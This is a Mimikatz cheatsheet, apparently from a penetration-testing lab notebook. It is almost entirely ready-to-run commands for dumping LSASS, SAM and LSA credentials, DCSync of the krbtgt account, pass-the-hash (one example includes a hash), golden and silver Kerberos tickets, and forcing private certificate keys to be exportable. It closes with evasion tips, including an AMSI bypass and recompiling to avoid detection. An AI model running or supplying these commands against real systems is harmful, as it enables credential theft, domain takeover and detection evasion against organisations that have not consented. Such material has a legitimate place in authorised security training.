Mimikatz Cheatsheet

Basic Syntax

mimikatz.exe "command1" "command2" "exit"

Always start with:

privilege::debug

Quick Reference Commands

Command	Purpose
`privilege::debug`	Enable debug privileges (required)
`sekurlsa::logonpasswords`	Dump all credentials from LSASS
`sekurlsa::credman`	Dump Credential Manager secrets
`sekurlsa::tickets /export`	Export Kerberos tickets
`lsadump::sam`	Dump local SAM database
`lsadump::secrets`	Dump LSA secrets
`lsadump::cache`	Dump cached domain credentials
`lsadump::dcsync /user:Administrator`	DCSync attack

Modules Overview

Module	Purpose
`sekurlsa`	Extract credentials from LSASS memory
`lsadump`	Dump LSA secrets, SAM, DCSync
`kerberos`	Kerberos ticket operations
`vault`	Windows Vault/Credential Manager
`dpapi`	DPAPI decryption
`crypto`	Certificate and key operations
`token`	Token manipulation

sekurlsa Module

Command	Description
`sekurlsa::logonpasswords`	Dump all logon passwords
`sekurlsa::credman`	Dump Credential Manager
`sekurlsa::dpapi`	Dump DPAPI masterkeys
`sekurlsa::tickets`	List Kerberos tickets
`sekurlsa::tickets /export`	Export tickets to .kirbi files
`sekurlsa::wdigest`	Dump WDigest credentials
`sekurlsa::ekeys`	Dump Kerberos encryption keys

Pass-the-Hash

sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:cmd.exe

Pass-the-Hash (with RC4)

sekurlsa::pth /user:<user> /rc4:<hash> /domain:<domain> /run:cmd.exe

Pass the Key / OverPass the Hash (with AES256)

sekurlsa::pth /user:<user> /domain:<domain> /aes256:<aes256_hash> /run:cmd.exe

Extract Kerberos Keys (for Pass the Key)

sekurlsa::ekeys

crypto Module (Certificates)

Command	Description
`crypto::capi`	Patch CryptoAPI to make non-exportable keys exportable
`crypto::cng`	Patch CNG to make non-exportable keys exportable
`crypto::certificates /export`	Export all user certificates
`crypto::certificates /systemstore:local_machine /export`	Export machine certificates

Export User Certificates

crypto::certificates /export

Export Machine Certificates

crypto::certificates /systemstore:local_machine /export

Make Keys Exportable (Patch CryptoAPI)

crypto::capi
crypto::cng

lsadump Module

Command	Description
`lsadump::sam`	Dump SAM database (local accounts)
`lsadump::secrets`	Dump LSA secrets
`lsadump::cache`	Dump cached domain creds (DCC2)
`lsadump::trust`	Dump trust relationships

DCSync Attack

lsadump::dcsync /domain:domain.local /user:Administrator
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /all /csv

Offline SAM Dump

lsadump::sam /sam:sam.hive /system:system.hive

Offline LSA Secrets

lsadump::secrets /system:system.hive /security:security.hive

Kerberos Attacks

Golden Ticket

kerberos::golden /user:Administrator /domain:domain.local /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ptt

Silver Ticket

kerberos::golden /user:Administrator /domain:domain.local /sid:<domain_sid> /target:<server> /service:<svc> /rc4:<svc_hash> /ptt

Ticket Operations

Command	Description
`kerberos::list`	List current tickets
`kerberos::ptt <file.kirbi>`	Pass-the-Ticket
`kerberos::purge`	Purge all tickets
`kerberos::tgt`	Get current TGT

DPAPI & Vault

Command	Description
`vault::list`	List vault credentials
`vault::cred`	Dump vault credentials
`dpapi::cred /in:<file>`	Decrypt credential file
`dpapi::blob /in:<file> /masterkey:<key>`	Decrypt DPAPI blob
`dpapi::masterkey /in:<file> /rpc`	Get masterkey via RPC

One-Liners

Full Credential Dump

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

Dump SAM

mimikatz.exe "privilege::debug" "lsadump::sam" "exit"

DCSync krbtgt

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:domain.local /user:krbtgt" "exit"

Pass-the-Hash

mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit

Export All Kerberos Tickets

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

Golden Ticket Attack

mimikatz.exe "privilege::debug" "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:<hash> /ptt" "exit"

Export All Certificates

mimikatz.exe "privilege::debug" "crypto::capi" "crypto::certificates /export" "exit"

Export Machine Certificates

mimikatz.exe "privilege::debug" "crypto::capi" "crypto::certificates /systemstore:local_machine /export" "exit"

Common Errors

Error	Solution
`ERROR kuhl_m_sekurlsa_acquireLSA`	Run as Administrator
`Privilege '20' KO`	Need local admin rights
`Handle on memory`	LSASS protected, try offline dump

Evasion Tips

Dump LSASS with procdump -ma lsass.exe lsass.dmp and analyze offline
Use pypykatz for cross-platform offline analysis
Use PowerShell Invoke-Mimikatz with AMSI bypass
Obfuscate or recompile from source

Create LSASS Dump (for offline analysis)

procdump.exe -ma lsass.exe lsass.dmp

Analyze with pypykatz (Linux)

pypykatz lsa minidump lsass.dmp

Keyboard shortcuts

notebook